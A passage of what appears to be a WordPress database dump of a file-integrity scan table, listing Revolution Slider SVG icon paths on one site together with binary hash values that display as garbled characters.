WԈjV','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_undo_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_undo_24px.svg',0,'CNafVRRYC','CNafVRRYC','WGvC5lܻ\'TwA3iXSAb=','',0,'?'),('|%\'I\Z|<','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_weekend_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_weekend_24px.svg',0,'8Tسr Ո','8Tسr Ո','2d?۾zAZNM=uXR|k{,','',0,'?'),('~\\EN؉Āç','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarm_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarm_24px.svg',0,'\'48;;q8@','\'48;;q8@','U \"\"غH- J=p','',0,'?'),('tg׽`޳;])','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarms_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarms_24px.svg',0,']mֳw(M\rEQ05',']mֳw(M\rEQ05','dȟ[2o6t1,i`4RR5','',0,'?'),('Zd+dA','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_time_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_time_24px.svg',0,'\n8l}+QG ','\n8l}+QG ','~2`[ éYR:ٗέ0\0#$s(','',0,'?'),('E՗_G<^','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_add_alarm_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_add_alarm_24px.svg',0,']4&?\rR4軉N',']4&?\rR4軉N','ѕ~=+:s vbO50.\r#\00d','',0,'?'),(';2]}Ž','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_active_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_active_24px.svg',0,'Aہ&lo|[E','Aہ&lo|[E','P\'ooLC~ovPad}~ ','',0,'?'),('@J]ka=','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_inactive_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_inactive_24px.svg',0,'^\'QW1ڜ','^\'QW1ڜ','fRָm;rν@qhɶ7c','',0,'?'),('2e\'$\ZL','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_20_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_20_24px.svg',0,'mqup:&me','mqup:&me','RdפpS\Zx)q.]X*NJ \nh','',0,'?'),('A|ୢ','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_30_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_30_24px.svg',0,'\Z9UJ\n','\Z9UJ\n','BQiA KgFa~i$3','',0,'?'),('>q$','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_50_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_50_24px.svg',0,'wf\\8W0@}','wf\\8W0@}','U4CѯQQ9y;\' Lhc','',0,'?'),('XgmTd+(ݻ:','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_60_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_60_24px.svg',0,'\n-uPvt','\n-uPvt','ɲa|#=0p_фIO~\rS\"9','',0,'?'),('+A) l','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_80_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_80_24px.svg',0,'M-j=ѵbg','M-j=ѵbg','SI#pw8\nOv`\\x','',0,'?'),('VDv+','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_90_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_90_24px.svg',0,'+jCx%','+jCx%','D vSw9Ot\\FdkW?؋','',0,'?'),('rH\\{_̶5','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_alert_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_alert_24px.svg',0,'3.Il\'k-r','3.Il\'k-r','.hy\'7\\4+}-r','',0,'?'),('[aI^s`/ ','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_20_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_20_24px.svg',0,'ܳ]Y1+4$<[\\','ܳ]Y1+4$<[\\','3}<_.^j#fwB_Oj','',0,'?'),('2U8f~}WwLq','',0,'?'),('\rTs&%n','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_full_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_full_24px.svg',0,'%mh\Z{FI$۝','%mh\Z{FI$۝','=mYu\"^D{. d','',0,'?'),('Q_*vRJ','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_std_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_std_24px.svg',0,'%mh\Z{FI$۝','%mh\Z{FI$۝','=mYu\"^D{. d','',0,'?'),(',&VM.','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_unknown_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_unknown_24px.svg',0,'u~/d\Z','u~/d\Z','! 溩p֟ƻfn=Kfn[YMB','',0,'?'),('7;5Xd5::E','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_24px.svg',0,'%x_j','%x_j','9VxC$BH.^ұC4R','',0,'?'),(' F@yZ=','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_connected_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_connected_24px.svg',0,'SAը)/~xaF','SAը)/~xaF','mvH1\\ȒKZҹ','',0,'?'),('5s Mq','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_disabled_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_disabled_24px.svg',0,'3L1y#BF\na','3L1y#BF\na',' cX ,.1X-\0ߓ?f1r','',0,'?'),(' ݘ@?ڮDy','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_searching_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_searching_24px.svg',0,'c\r;Ǐ_','c\r;Ǐ_','>TV\nC~8LOɁYvK˶De\'%','',0,'?'),('`]R4#w\r\n','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_auto_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_auto_24px.svg',0,'0=TP#8@qU','0=TP#8@qU','s4n2K4FЇ,#\nPYKڻ','',0,'?'),('1Cv:5','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_high_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_high_24px.svg',0,'zQD ˙s','zQD ˙s','&QKv%N\0uIvY','',0,'?'),('9Rbd','',0,'?'),('}\r\0]9U','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_data_usage_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_data_usage_24px.svg',0,'KK4Lΰq;','KK4Lΰq;','B\'8KN¡(4HAw3*?','',0,'?'),('\nt\'P.','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_developer_mode_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_developer_mode_24px.svg',0,'$g\ZXYy:','$g\ZXYy:','ԟp+\\m>o_ƟiWDhEIztY','',0,'?'),('*SI(nO%{GzT','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_devices_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_devices_24px.svg',0,'S4X ~W','S4X ~W','aAF\\.1\Z]rYS@|5w','',0,'?'),('\\\'=S%%bS($','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_dvr_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_dvr_24px.svg',0,'Pf_=Fro','Pf_=Fro','\">bMĥ]ڃS&','',0,'?'),(' .AG%ǙBdU','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_fixed_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_fixed_24px.svg',0,'G~)5o!g','G~)5o!g','W?ړ-JAV۩TS`o{+','',0,'?'),('|z( R)fj','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_not_fixed_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_not_fixed_24px.svg',0,'>xEyQ/bV','>xEyQ/bV','SBށG;+bp_@=,n[M','',0,'?'),('%޹ Q\r=','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_off_24px.svg',0,'%ůuœ\0nj ','%ůuœ\0nj ','S1iKѡnKg-t#<:մ-','',0,'?'),('dBqo|','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_graphic_eq_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_graphic_eq_24px.svg',0,'^H}Tǚe +','^H}Tǚe +','*UY-}9޳\rMC ~','',0,'?'),('J*g6ʟ~vp@','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_disabled_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_disabled_24px.svg',0,'%ůuœ\0nj ','%ůuœ\0nj ','S1iKѡnKg-t#<:մ-','',0,'?'),('a?\"}Bh','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_searching_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_searching_24px.svg',0,'>xEyQ/bV','>xEyQ/bV','SBށG;+bp_@=,n[M','',0,'?'),('-YM\'$NW~','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_cell_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_cell_24px.svg',0,'8;5z N#7\'+\0','8;5z N#7\'+\0','K9~B &XXvd}qr [','',0,'?'),('\roM:Xk','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_wifi_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_wifi_24px.svg',0,'1C','1C','V+b(8L%m\nI','',0,'?'),('6g$ 3Ydv@','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_nfc_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_nfc_24px.svg',0,'%g:ZBw7VP','%g:ZBw7VP','%?$^ uզY\0@kW;.*','',0,'?'),('(~?#0ҹ','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_landscape_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_landscape_24px.svg',0,'\"t=Yo','\"t=Yo','ճe!}#[}ƒb+fՍ<','',0,'?'),('i[^sT<ź{7','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_portrait_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_portrait_24px.svg',0,',$qeO`.DP',',$qeO`.DP','fٟMҖ*M\Z!,bq3k\nN ','',0,'?'),('fc~spѹ߁3','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_rotation_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_rotation_24px.svg',0,',U,bWTY<~',',U,bWTY<~','M1 h|/zCn*:a@=|','',0,'?'),('ݜ^qE~}(','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_rotation_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_rotation_24px.svg',0,':=6F0q',':=6F0q','yr!w\0}@xɳp=9G049','',0,'?'),(',\\ާp҉^v','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_sd_storage_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_sd_storage_24px.svg',0,'$NoIgB','$NoIgB','gl 7IՁA=','',0,'?'),('n̑4[j|','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_settings_system_daydream_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_settings_system_daydream_24px.svg',0,'83y!-R','83y!-R','-)GR/̓ZDC+s^+Z','',0,'?'),('bWǠU> X\r.e ','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_0_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_0_bar_24px.svg',0,'ߨTM-Ht!Sl4','ߨTM-Ht!Sl4','Mv%w4uFxA[#>x$','',0,'?'),('XxI]Ͽ ','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_1_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_1_bar_24px.svg',0,'h,mVOU','h,mVOU','b yu\Z\'/Um3|ƎUd \Z','',0,'?'),('ڗʧfV','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_2_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_2_bar_24px.svg',0,'i4w P 9\r/','i4w P 9\r/','^w#a/\'= Y-KGwڙ','',0,'?'),(' *\"A\"','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_3_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_3_bar_24px.svg',0,'8;5z N#7\'+\0','8;5z N#7\'+\0','K9~B &XXvd}qr [','',0,'?'),('/l%pf`\n','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_4_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_4_bar_24px.svg',0,'Ef=qzr\\','Ef=qzr\\','X%й0Yhj}1R','',0,'?'),('E[@N\\8}+','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_0_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_0_bar_24px.svg',0,'>+~PԆ){8*','>+~PԆ){8*','+pFLÚ`nnWOwA\',','',0,'?'),('jHGw,ƙ','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_1_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_1_bar_24px.svg',0,'.6%=','.6%=','0+1XҍI}bP@\\B','',0,'?'),('N_ L\'8YZ2','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_2_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_2_bar_24px.svg',0,'}ߔ`њh','}ߔ`њh','׏GD3W*pG# Z ~_0Z','',0,'?'),('JLpdq','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_3_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_3_bar_24px.svg',0,'G#I֑/E','G#I֑/E','S!Wni}COB\\Ѓ[T','',0,'?'),('f kUCM\0w?&','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_4_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_4_bar_24px.svg',0,'U\0{\r>Uy','U\0{\r>Uy','Vto\n)V/4^*4G}_5A','',0,'?'),('t9t_mF','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_no_sim_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_no_sim_24px.svg',0,'r\ni#څU','r\ni#څU','\\N VXDkYc<U ','',0,'?'),('8IH܂\"ڜ','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_null_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_null_24px.svg',0,'o7K_¼ ','o7K_¼ ','4mj {|>|MjZZ%}~','',0,'?'),('_:Q\ZoC}EH','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_off_24px.svg',0,'0(=*M','0(=*M',';64bAoo8anri[h','',0,'?'),('m[s*W,XÐ:','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_0_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_0_bar_24px.svg',0,'\nRȮid\Zf','\nRȮid\Zf','fnjvmuϛ\"Bץ▁9|7','',0,'?'),('!mL\\Fb','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_24px.svg',0,'vJ쫻 6BHr|','vJ쫻 6BHr|','ǜkFK}sizmWf;~c','',0,'?'),('kյ0Qo','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_lock_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_lock_24px.svg',0,' sM7/$',' sM7/$','[tїtwch3','',0,'?'),('FY4\0M\"B#&','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_24px.svg',0,'8p_|\'Fwn2G','8p_|\'Fwn2G','O S4Beph5G0','',0,'?'),('%Qp\ni̮#&','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_lock_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_lock_24px.svg',0,'X_Kat%[=_Z','X_Kat%[=_Z','Sk-q6пRe+nI&','',0,'?'),('J#j2\r|T','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_24px.svg',0,'1C','1C','V+b(8L%m\nI','',0,'?'),('+Y\\^','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_lock_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_lock_24px.svg',0,'7fu3beG','7fu3beG','pDПrc,zj?jOZN','',0,'?'),('~LZ#ڞ8ne','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_24px.svg',0,'K:g2?Bi$V','K:g2?Bi$V','-$16#|M[\rR$Fw!','',0,'?'),('e|6)','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_lock_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_lock_24px.svg',0,']j0^Pӯ-m',']j0^Pӯ-m','>qwFb6 Z|GoQ{+Lo','',0,'?'),('Ӗe!Lݹ \0N ','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_off_24px.svg',0,'}Nuz}f','}Nuz}f','>yE\ZkF~>#/]̧:','',0,'?'),('7ֆ3i{d2','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_1_bar_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_1_bar_26x24px.svg',0,']tNw+',']tNw+','iڮ-gf@7!W~Z̀-','',0,'?'),('W>.N//pىdž','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_2_bar_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_2_bar_26x24px.svg',0,'Hgc$','Hgc$','>3x^r!RH.rwC퀽\r','',0,'?'),('`k$i޽j`','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_3_bar_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_3_bar_26x24px.svg',0,'\ZDB','\ZDB','v;b}\0j?I޴igQ\"т`C','',0,'?'),('G\'`7 )̼\\','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_4_bar_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_4_bar_26x24px.svg',0,'ZJX̦Z','ZJX̦Z','G@F, u~xlnHp\09$f\'pU','',0,'?'),('T͓\nah>','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_1_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_1_26x24px.svg',0,'eT}=','eT}=','?RGDߐOe4Sᣱ=[I','',0,'?'),('OEk&O','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_26x24px.svg',0,'ᴨQX','ᴨQX','8.i-߇L.W掲 aNa','',0,'?'),('X#8 Lbd','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_2_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_2_26x24px.svg',0,'=#R51','=#R51','佶Q 賚\rɭP.M\ZH\\ɭ| V','',0,'?'),('社eH p','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_3_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_3_26x24px.svg',0,'ߍ],+u8','ߍ],+u8',' \'u}.0(\'э^.gE','',0,'?'),('urD>1SSX','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_4_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_4_26x24px.svg',0,'4,YnTx','4,YnTx','߅z\nc,\"daq!P3hr','',0,'?'),('NBaW) $:Ε','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_not_connected_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_not_connected_26x24px.svg',0,'\\uDG7','\\uDG7','98]y\0\"w? u}Ҿau9p','',0,'?'),('\\JL~yzb,','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_null_26x24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_null_26x24px.svg',0,'L 5$RZ(:','L 5$RZ(:','ʖ~Pa#;Ϧ~ TL','',0,'?'),('y2%ÅI>-eJ','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_storage_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_storage_24px.svg',0,' FPb!',' FPb!','n\"_~ E+P@OSp_^*\"','',0,'?'),('EM Z;x$>:_~','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_usb_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_usb_24px.svg',0,'SG*m4iS','SG*m4iS','QeaxH$Hu*\')g\0','',0,'?'),('ѠܱUfO) 0','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wallpaper_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wallpaper_24px.svg',0,'ǸN<\rI}6','ǸN<\rI}6','#׫Njˇl?[߭:Cls','',0,'?'),('tWϾL4]T\'C','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_widgets_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_widgets_24px.svg',0,'P̚]|SN','P̚]|SN','0{K^BF!mDq< B','',0,'?'),('Fz#\n)7Z','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_lock_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_lock_24px.svg',0,'闘Mȕїz','闘Mȕїz','0 e(pz ~\ZKE','',0,'?'),('-7OnWvE','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_tethering_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_tethering_24px.svg',0,'z0No,g+jG','z0No,g+jG','@h9K5<Б =K j 0\"','',0,'?'),('~ag+','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_attach_file_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_attach_file_24px.svg',0,'`BkΩm.','`BkΩm.','wQwV,?Aέ00hv:y,$4','',0,'?'),('!\r\"Z~+ ','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_attach_money_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_attach_money_24px.svg',0,' xJxr\r5',' xJxr\r5','֘oX2[?Nd+A=','',0,'?'),('wRҾz\'*m3 @d','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_all_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_all_24px.svg',0,'d@ő\nb2','d@ő\nb2','y e Mti[xS.$.3\'pF','',0,'?'),('gasܧ4','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_bottom_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_bottom_24px.svg',0,'Geɘ[v','Geɘ[v','wb:D^\'܈','',0,'?'),('-纖(\"Cj','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_clear_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_clear_24px.svg',0,'H;{ei:*','H;{ei:*','ʆc uݬ$q\"@','',0,'?'),('e\0s\n>\" ','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_color_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_color_24px.svg',0,'|HXz׋١U','|HXz׋١U','I) } J|yrˇ]eE\'','',0,'?'),('kH[lfz,','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_horizontal_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_horizontal_24px.svg',0,'G8FG{( ','G8FG{( ','!.Tu#׿m~\0DXϮm^# 